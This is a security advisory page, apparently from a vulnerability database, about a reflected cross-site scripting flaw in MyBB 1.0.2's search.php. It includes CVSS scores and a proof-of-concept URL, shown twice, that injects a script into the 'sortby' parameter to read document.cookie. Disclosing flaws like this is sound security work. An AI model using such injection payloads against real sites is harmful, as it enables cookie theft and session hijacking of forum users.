MyBB 1.0.2 XSS attack in search.php redirection

2006.01.28
Credit: imei
Risk: Low
Local: Yes
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

http://127.0.0.1/mybb/search.php?action=do_search&keywords=&postthread=1 &author=imei&matchusername=1&forums=all&findthreadst=1&numreplies=&postd ate=0&pddir=1&sortby="><script language=javascript>alert(document.cookie)</script>&sorder=1&showresults =threads&submit=Search --------------------Summary---------------- Software: MyBB Sowtware's Web Site: http://www.mybboard.com Versions: 1.0.2 updated Class: Remote Status: Unpatched Exploit: Available Solution: Not Available Discovered by: imei Risk Level:low -----------------Description--------------- Mybb has a security bug that allows hackers run unwanted scripts into client's browser that well known as XSS cross site scripting bug is in result of poor cheknig of two input varibles "sortby" & "sortordr" in redirection page of search pages. line668of search.php a full exploit can result to thefting cookies... bug founded by imei and reported to vendor... --------------Exploit---------------------- go to this url: /mybb/search.php?action=do_search&keywords=&postthread=1&author=imei&mat chusername=1&forums=all&findthreadst=1&numreplies=&postdate=0&pddir=1&so rtby="><script language=javascript>alert(document.cookie)</script>&sorder=1&showresults =threads&submit=Search --------------Solution--------------------- No Patch available. --------------Credit----------------------- Discovered by: imei addmimistrator[at]gmail[dot]com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top